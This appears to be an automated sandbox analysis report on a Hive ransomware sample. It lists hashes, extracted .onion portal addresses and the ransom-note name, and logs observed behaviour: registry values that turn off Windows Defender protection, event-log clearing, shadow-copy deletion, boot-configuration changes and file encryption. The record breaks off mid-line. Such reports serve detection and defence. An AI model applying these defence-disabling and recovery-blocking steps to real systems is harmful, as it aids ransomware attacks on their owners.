Analysis
-
max time kernel
105s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2022 19:52
Static task
static1
Behavioral task
behavioral1
Sample
0e4d44dde522c07d09d9e3086cfae803.exe
Resource
win7-20220812-en
General
-
Target
0e4d44dde522c07d09d9e3086cfae803.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
-
SSDEEP
49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO
Malware Config
Extracted
C:\n8pw_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Hive
A ransomware written in Golang first seen in June 2021.
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 3368 wevtutil.exe 3868 wevtutil.exe 5068 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1536 bcdedit.exe 4384 bcdedit.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\UnprotectConvertFrom.tiff.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File renamed C:\Users\Admin\Pictures\FindClear.png => C:\Users\Admin\Pictures\FindClear.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Users\Admin\Pictures\FindClear.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_IAAAACAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File renamed C:\Users\Admin\Pictures\LimitDisable.tif => C:\Users\Admin\Pictures\LimitDisable.tif.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Users\Admin\Pictures\LimitDisable.tif.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File renamed C:\Users\Admin\Pictures\SyncCompress.raw => C:\Users\Admin\Pictures\SyncCompress.raw.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Users\Admin\Pictures\SyncCompress.raw.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File renamed C:\Users\Admin\Pictures\UnprotectConvertFrom.tiff => C:\Users\Admin\Pictures\UnprotectConvertFrom.tiff.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-pl.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_CAAAAAgAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Wood.dxt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-white\WideTile.scale-100.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\WideTile.scale-200.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48_altform-lightunplated.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White@3x.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileMediumSquare.scale-200.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AgAAAAIAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\basicstylish.dotx.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-24.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Square310x310Logo.scale-100.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-40.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HgAAAB4AAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-150.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_BgAAAAYAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\BadgeLogo.scale-200_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-400.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\PlayStore_icon.svg.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_KAAAACgAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\iexplore.exe.mui 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-pl.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_BgAAAAYAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\webviewCore.min.js 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoSearchResults_180x160.svg.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\createpdf.svg.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_CAAAAAgAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hu-hu\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Retail-ppd.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HgAAAB4AAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-20_altform-unplated.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-36_altform-lightunplated.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-400.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_HAAAABwAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_KMS_Automation-ul.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_DAAAAAwAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-16_altform-unplated_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\index.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-125.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_hover_2x.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_JAAAACQAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldExist.snippets.ps1xml 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_JgAAACYAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-80_altform-unplated_contrast-white.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\SmallTile.scale-200.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\hand.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\db2v0801.xsl.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_EgAAABIAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-ms.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_EAAAABAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\n8pw_HOW_TO_DECRYPT.txt 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN010.XML.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_AAAAAAAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24.png 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ui-strings.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_JgAAACYAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\plugin.js.Sjq7UdeNH7hcX2RWdxFJhrpL85jSKGyv202XcgRzRf3_MAAAADAAAAA0.cv2gj 0e4d44dde522c07d09d9e3086cfae803.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2112 sc.exe 4464 sc.exe 3860 sc.exe 4180 sc.exe 2192 sc.exe 3872 sc.exe 2684 sc.exe 4120 sc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3172 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2400 powershell.exe 2400 powershell.exe 3160 powershell.exe 3160 powershell.exe 3536 0e4d44dde522c07d09d9e3086cfae803.exe 3536 0e4d44dde522c07d09d9e3086cfae803.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 3368 wevtutil.exe Token: SeBackupPrivilege 3368 wevtutil.exe Token: SeSecurityPrivilege 3868 wevtutil.exe Token: SeBackupPrivilege 3868 wevtutil.exe Token: SeSecurityPrivilege 5068 wevtutil.exe Token: SeBackupPrivilege 5068 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2136 wmic.exe Token: SeSecurityPrivilege 2136 wmic.exe Token: SeTakeOwnershipPrivilege 2136 wmic.exe Token: SeLoadDriverPrivilege 2136 wmic.exe Token: SeSystemProfilePrivilege 2136 wmic.exe Token: SeSystemtimePrivilege 2136 wmic.exe Token: SeProfSingleProcessPrivilege 2136 wmic.exe Token: SeIncBasePriorityPrivilege 2136 wmic.exe Token: SeCreatePagefilePrivilege 2136 wmic.exe Token: SeBackupPrivilege 2136 wmic.exe Token: SeRestorePrivilege 2136 wmic.exe Token: SeShutdownPrivilege 2136 wmic.exe Token: SeDebugPrivilege 2136 wmic.exe Token: SeSystemEnvironmentPrivilege 2136 wmic.exe Token: SeRemoteShutdownPrivilege 2136 wmic.exe Token: SeUndockPrivilege 2136 wmic.exe Token: SeManageVolumePrivilege 2136 wmic.exe Token: 33 2136 wmic.exe Token: 34 2136 wmic.exe Token: 35 2136 wmic.exe Token: 36 2136 wmic.exe Token: SeIncreaseQuotaPrivilege 5028 wmic.exe Token: SeSecurityPrivilege 5028 wmic.exe Token: SeTakeOwnershipPrivilege 5028 wmic.exe Token: SeLoadDriverPrivilege 5028 wmic.exe Token: SeSystemProfilePrivilege 5028 wmic.exe Token: SeSystemtimePrivilege 5028 wmic.exe Token: SeProfSingleProcessPrivilege 5028 wmic.exe Token: SeIncBasePriorityPrivilege 5028 wmic.exe Token: SeCreatePagefilePrivilege 5028 wmic.exe Token: SeBackupPrivilege 5028 wmic.exe Token: SeRestorePrivilege 5028 wmic.exe Token: SeShutdownPrivilege 5028 wmic.exe Token: SeDebugPrivilege 5028 wmic.exe Token: SeSystemEnvironmentPrivilege 5028 wmic.exe Token: SeRemoteShutdownPrivilege 5028 wmic.exe Token: SeUndockPrivilege 5028 wmic.exe Token: SeManageVolumePrivilege 5028 wmic.exe Token: 33 5028 wmic.exe Token: 34 5028 wmic.exe Token: 35 5028 wmic.exe Token: 36 5028 wmic.exe Token: SeIncreaseQuotaPrivilege 5028 wmic.exe Token: SeSecurityPrivilege 5028 wmic.exe Token: SeTakeOwnershipPrivilege 5028 wmic.exe Token: SeLoadDriverPrivilege 5028 wmic.exe Token: SeSystemProfilePrivilege 5028 wmic.exe Token: SeSystemtimePrivilege 5028 wmic.exe Token: SeProfSingleProcessPrivilege 5028 wmic.exe Token: SeIncBasePriorityPrivilege 5028 wmic.exe Token: SeCreatePagefilePrivilege 5028 wmic.exe Token: SeBackupPrivilege 5028 wmic.exe Token: SeRestorePrivilege 5028 wmic.exe Token: SeShutdownPrivilege 5028 wmic.exe Token: SeDebugPrivilege 5028 wmic.exe Token: SeSystemEnvironmentPrivilege 5028 wmic.exe Token: SeRemoteShutdownPrivilege 5028 wmic.exe Token: SeUndockPrivilege 5028 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3536 wrote to memory of 3752 3536 0e4d44dde522c07d09d9e3086cfae803.exe 83 PID 3536 wrote to memory of 3752 3536 0e4d44dde522c07d09d9e3086cfae803.exe 83 PID 3752 wrote to memory of 204 3752 net.exe 85 PID 3752 wrote to memory of 204 3752 net.exe 85 PID 3536 wrote to memory of 4836 3536 0e4d44dde522c07d09d9e3086cfae803.exe 86 PID 3536 wrote to memory of 4836 3536 0e4d44dde522c07d09d9e3086cfae803.exe 86 PID 4836 wrote to memory of 4568 4836 net.exe 88 PID 4836 wrote to memory of 4568 4836 net.exe 88 PID 3536 wrote to memory of 4360 3536 0e4d44dde522c07d09d9e3086cfae803.exe 89 PID 3536 wrote to memory of 4360 3536 0e4d44dde522c07d09d9e3086cfae803.exe 89 PID 4360 wrote to memory of 176 4360 net.exe 91 PID 4360 wrote to memory of 176 4360 net.exe 91 PID 3536 wrote to memory of 4612 3536 0e4d44dde522c07d09d9e3086cfae803.exe 92 PID 3536 wrote to memory of 4612 3536 0e4d44dde522c07d09d9e3086cfae803.exe 92 PID 4612 wrote to memory of 3836 4612 net.exe 94 PID 4612 wrote to memory of 3836 4612 net.exe 94 PID 3536 wrote to memory of 2228 3536 0e4d44dde522c07d09d9e3086cfae803.exe 95 PID 3536 wrote to memory of 2228 3536 0e4d44dde522c07d09d9e3086cfae803.exe 95 PID 2228 wrote to memory of 4696 2228 net.exe 97 PID 2228 wrote to memory of 4696 2228 net.exe 97 PID 3536 wrote to memory of 3692 3536 0e4d44dde522c07d09d9e3086cfae803.exe 98 PID 3536 wrote to memory of 3692 3536 0e4d44dde522c07d09d9e3086cfae803.exe 98 PID 3692 wrote to memory of 2248 3692 net.exe 100 PID 3692 wrote to memory of 2248 3692 net.exe 100 PID 3536 wrote to memory of 2692 3536 0e4d44dde522c07d09d9e3086cfae803.exe 101 PID 3536 wrote to memory of 2692 3536 0e4d44dde522c07d09d9e3086cfae803.exe 101 PID 2692 wrote to memory of 3084 2692 net.exe 103 PID 2692 wrote to memory of 3084 2692 net.exe 103 PID 3536 wrote to memory of 3232 3536 0e4d44dde522c07d09d9e3086cfae803.exe 104 PID 3536 wrote to memory of 3232 3536 0e4d44dde522c07d09d9e3086cfae803.exe 104 PID 3232 wrote to memory of 3708 3232 net.exe 106 PID 3232 wrote to memory of 3708 3232 net.exe 106 PID 3536 wrote to memory of 4464 3536 0e4d44dde522c07d09d9e3086cfae803.exe 107 PID 3536 wrote to memory of 4464 3536 0e4d44dde522c07d09d9e3086cfae803.exe 107 PID 3536 wrote to memory of 3860 3536 0e4d44dde522c07d09d9e3086cfae803.exe 109 PID 3536 wrote to memory of 3860 3536 0e4d44dde522c07d09d9e3086cfae803.exe 109 PID 3536 wrote to memory of 4180 3536 0e4d44dde522c07d09d9e3086cfae803.exe 111 PID 3536 wrote to memory of 4180 3536 0e4d44dde522c07d09d9e3086cfae803.exe 111 PID 3536 wrote to memory of 2192 3536 0e4d44dde522c07d09d9e3086cfae803.exe 113 PID 3536 wrote to memory of 2192 3536 0e4d44dde522c07d09d9e3086cfae803.exe 113 PID 3536 wrote to memory of 3872 3536 0e4d44dde522c07d09d9e3086cfae803.exe 115 PID 3536 wrote to memory of 3872 3536 0e4d44dde522c07d09d9e3086cfae803.exe 115 PID 3536 wrote to memory of 2684 3536 0e4d44dde522c07d09d9e3086cfae803.exe 117 PID 3536 wrote to memory of 2684 3536 0e4d44dde522c07d09d9e3086cfae803.exe 117 PID 3536 wrote to memory of 4120 3536 0e4d44dde522c07d09d9e3086cfae803.exe 119 PID 3536 wrote to memory of 4120 3536 0e4d44dde522c07d09d9e3086cfae803.exe 119 PID 3536 wrote to memory of 2112 3536 0e4d44dde522c07d09d9e3086cfae803.exe 121 PID 3536 wrote to memory of 2112 3536 0e4d44dde522c07d09d9e3086cfae803.exe 121 PID 3536 wrote to memory of 3696 3536 0e4d44dde522c07d09d9e3086cfae803.exe 123 PID 3536 wrote to memory of 3696 3536 0e4d44dde522c07d09d9e3086cfae803.exe 123 PID 3536 wrote to memory of 1696 3536 0e4d44dde522c07d09d9e3086cfae803.exe 125 PID 3536 